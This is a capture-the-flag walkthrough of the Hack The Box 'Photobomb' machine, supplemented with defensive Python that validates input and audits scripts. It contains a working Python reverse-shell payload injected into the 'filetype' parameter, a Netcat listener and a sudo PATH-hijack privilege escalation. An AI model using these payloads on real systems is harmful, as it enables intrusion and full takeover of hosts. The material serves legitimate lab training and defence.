HTB | Photobomb | Walkthrough

ceelineek
Published in InfoSec Write-ups
5 min read, Feb 12, 2023

The HTB — Photobomb machine is rated as easy. As I am a complete beginner, I think the difficulty level is accurate.

About the Box

Easy box, good for beginners, writeups already available.
Box retired in February 2023.

Reconnaissance

As usual, I started with active reconnaissance against the given target.

nmap -sC -sV 10.10.11.192

This gives us some interesting feedback.
In total nmap finds only two open TCP ports:
- SSH (22)
- HTTP (80)

Web Enumeration — TCP — Port 80
We start by inspecting port 80 with some web enumeration.

Opening 10.10.11.192:80 in the web browser returns an error, so we add the domain name photobomb.htb to our /etc/hosts file.

sudo nano /etc/hosts

General Impression
A website about photoshop. There is not much to see on the main page except a login page, and basic default credentials do not work.

Basic Enumeration
robots.txt file — Returns a strange page:

sitemap.xml — Returns a page similar to robots.txt.
curl against the website — Returns nothing very interesting.
Inspecting the website — Here we found something interesting in the Debugger tab: JavaScript code that contains credentials for tech-support staff who forget their login data.

We then copy the href URL from that script, http://photobomb.htb/printer, into the browser and receive the following message:

After pressing the OK button we see a new page. The found credential is now stored in the Cookies section: we are logged in with the tech-support pre-built credential. We now see the new page below, called /printer:

This page lets us download pictures as either JPG or PNG files in different sizes.

I inspected the /printer page in more detail but found nothing interesting. While looking at the page source code, I again received a pop-up message to confirm my credentials:

But again, nothing interesting is found in the source code itself.

So we go back to the printer page and try to capture the download traffic using Burp Suite.
(If you are using Burp Suite for the first time, follow this guide to set it up in Firefox: Configuring Firefox to work with Burp Suite — PortSwigger.)

  1. Open Burp Suite, navigate to the Proxy tab and turn on Intercept.
  2. Navigate back to the photobomb.htb/printer page and press the Download button.
  3. Go back to Burp Suite and check whether the download request has been captured:

Exploit

  1. We can see that there is a filetype parameter. We will try to inject our reverse shell command there. For that, use the Action button and send the captured request to the Repeater.
  2. Before we send our payload, we first set up a Netcat listener to catch the reverse shell: nc -lnvp 9001
  3. I tried using a bash shell, but that didn’t work. Therefore I am trying to use a python3 reverse shell.
    (I used ChatGPT to help me build the needed shell.)
filetype=png%3bexport+RHOST%3d"10.10.xx.xx"%3bexport+RPORT%3d9001%3bpython3+-c+'import+sys,socket,os,pty%3bs%3dsocket.socket()%3bs.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))))%3b[os.dup2(s.fileno(),fd)+for+fd+in+(0,1,2)]%3bpty.spawn("sh")'&dimensions=3000x2000

Make sure to change the IP address to your machine's IP, and the port number needs to match your listener (the yellow-marked parts).

We can then hit the Send button.

The Repeater stops giving back a response, which is a good sign!
Wait a few more seconds and we have the shell! :D
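As an added example (not code from the original post or from the Photobomb application, whose source is not on the page): the injection works because the filetype value reaches a shell unchanged. This Python shows the vulnerable string-building pattern beside a hardened handler that decodes the form body the way the server would, allowlists both parameters and builds an argv list instead of a shell string; the convert command, paths and sample bodies are constructed assumptions.

```python
import re
from urllib.parse import parse_qs

# Allowlist for the two /printer parameters; anything else is rejected outright.
ALLOWED_FILETYPES = {"png", "jpg"}
DIMENSIONS_RE = re.compile(r"\d{1,5}x\d{1,5}")

class InvalidParameter(ValueError):
    """Raised when a request parameter is outside the allowlist."""

def unsafe_shell_command(filetype, dimensions):
    """The vulnerable pattern: user input interpolated into one shell string.
    A ';' in filetype ends the convert command and starts a new one."""
    return f"convert photo.jpg -resize {dimensions} output.{filetype}"

def validate_download(filetype, dimensions):
    """Check the whole value against the allowlist (not just a prefix), so
    'png;...' is rejected even though it starts with a valid type."""
    if filetype not in ALLOWED_FILETYPES:
        raise InvalidParameter(f"filetype not allowed: {filetype!r}")
    if not DIMENSIONS_RE.fullmatch(dimensions):
        raise InvalidParameter(f"dimensions malformed: {dimensions!r}")
    return filetype, dimensions

def build_convert_argv(filetype, dimensions, source="/tmp/photo.jpg"):
    """Hardened form: validated values go into an argv list for
    subprocess.run(argv) with no shell, so metacharacters are never parsed.
    The ImageMagick 'convert' call and the paths are assumptions, not the app's."""
    ft, dim = validate_download(filetype, dimensions)
    return ["convert", source, "-resize", dim, f"/tmp/out_{dim}.{ft}"]

def request_is_acceptable(body):
    """Decode a URL-encoded form body as the server would and report whether
    the hardened validation would accept it (False = block it and log it)."""
    params = parse_qs(body, keep_blank_values=True)
    try:
        validate_download(params.get("filetype", [""])[0],
                          params.get("dimensions", [""])[0])
    except InvalidParameter:
        return False
    return True

# Constructed sample bodies: a normal download and one shaped like the
# walkthrough's injected request (decodes to 'png;export RHOST=...;...').
LEGIT_BODY = "filetype=png&dimensions=3000x2000"
INJECTED_BODY = ("filetype=png%3bexport+RHOST%3d%22203.0.113.5%22%3b"
                 "export+RPORT%3d9001&dimensions=3000x2000")
```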

We then upgrade the shell to a more stable one using the following command:

python3 -c 'import pty;pty.spawn("/bin/bash")'

We can now see that we have a shell as the user wizard.

User Flag
Now we can capture the user.txt flag. First navigate back to the home directory. There we can see with the command ls that the user.txt file exists. The command cat user.txt will print the user flag.

Privilege Escalation

First we want to see what sudo rights we have (sudo allows a user to run commands with root privileges when permitted).
sudo -l

We see that we are allowed to run the /opt/cleanup.sh file with elevated privileges.

Let's have a look at what that script contains:
cat /opt/cleanup.sh

From the script's contents we now know where the photobomb.log files are stored. We can also see that the script calls its commands without absolute paths, so we can take advantage of a PATH hijack: place our own executable with the same name earlier in the PATH than the real binary. Let's do that with the find binary the script calls.

  1. Navigate to folder /tmp
  2. echo bash > find
  3. chmod 777 find
  4. sudo PATH=$PWD:$PATH /opt/cleanup.sh
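As an added, defender-side example (not the author's code; the contents of /opt/cleanup.sh are not reproduced on the page): the hijack works because the script resolves find through PATH and sudo lets the caller set PATH. This Python audit flags bare command names in a script and detects a sudoers rule carrying the SETENV: tag; the sample script and the sudoers line are constructed, and the rule's form is an assumption.

```python
import re
import shlex
# Keywords after which another command follows, and builtins that never resolve
# through PATH (partial lists, enough for a typical cleanup script).
KEYWORDS = {"if", "then", "else", "elif", "do", "while", "until", "!"}
BUILTINS = {"cd", "echo", "export", "fi", "done", "exit", "return", "set",
            "unset", "[", "[[", "test", "local", "read", "shift", "true", "false"}
SEPARATORS = {";", "|", "||", "&&", "&", "(", ")"}

def unqualified_commands(script):
    """Return (line_no, name) for every external command invoked by bare name,
    i.e. looked up through PATH at run time. Absolute paths and builtins skip."""
    findings = []
    for no, line in enumerate(script.splitlines(), 1):
        lexer = shlex.shlex(line, posix=True, punctuation_chars=True)
        lexer.whitespace_split = True
        try:
            tokens = list(lexer)
        except ValueError:          # unbalanced quotes: skip rather than guess
            continue
        expect_cmd = True
        for tok in tokens:
            if tok in SEPARATORS or tok in KEYWORDS:
                expect_cmd = True
                continue
            if not expect_cmd:
                continue
            if re.fullmatch(r"[A-Za-z_][A-Za-z0-9_]*=.*", tok):
                continue            # VAR=value prefix; the command still follows
            expect_cmd = False
            if tok in BUILTINS or tok.startswith("/"):
                continue
            findings.append((no, tok))
    return findings

def sudo_rule_allows_env_override(sudoers, command):
    """True if a sudoers rule for `command` carries the SETENV: tag, which lets
    the invoker pass VAR=value pairs (PATH included) on the sudo command line."""
    pat = re.compile(r"^\s*\S+\s+\S+=\([^)]*\)\s+.*\bSETENV:.*"
                     + re.escape(command) + r"\s*$", re.MULTILINE)
    return bool(pat.search(sudoers))
# Constructed sample script in the shape the walkthrough describes (a log
# clean-up calling find by bare name); not the real /opt/cleanup.sh.
SAMPLE_SCRIPT = """#!/bin/bash
cd /opt/photobomb
if [ -s log/photobomb.log ]; then /bin/cat log/photobomb.log > log/photobomb.log.old; fi
find log -name '*.old' -mtime +7 -delete
"""
# Constructed sudoers line (assumed form); the page only shows sudo -l output.
SAMPLE_SUDOERS = "wizard ALL=(root) SETENV: NOPASSWD: /opt/cleanup.sh\n"
```

Fixing either finding closes the hole: call /usr/bin/find (or set PATH explicitly at the top of the script) and drop the SETENV: tag from the rule.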

Root Flag:
To get the root flag, navigate to /root with cd /root. The root.txt file is located there; use the command cat to print its contents.

And that is done! :)
Thank you for following along with my walkthrough. I hope it was helpful.
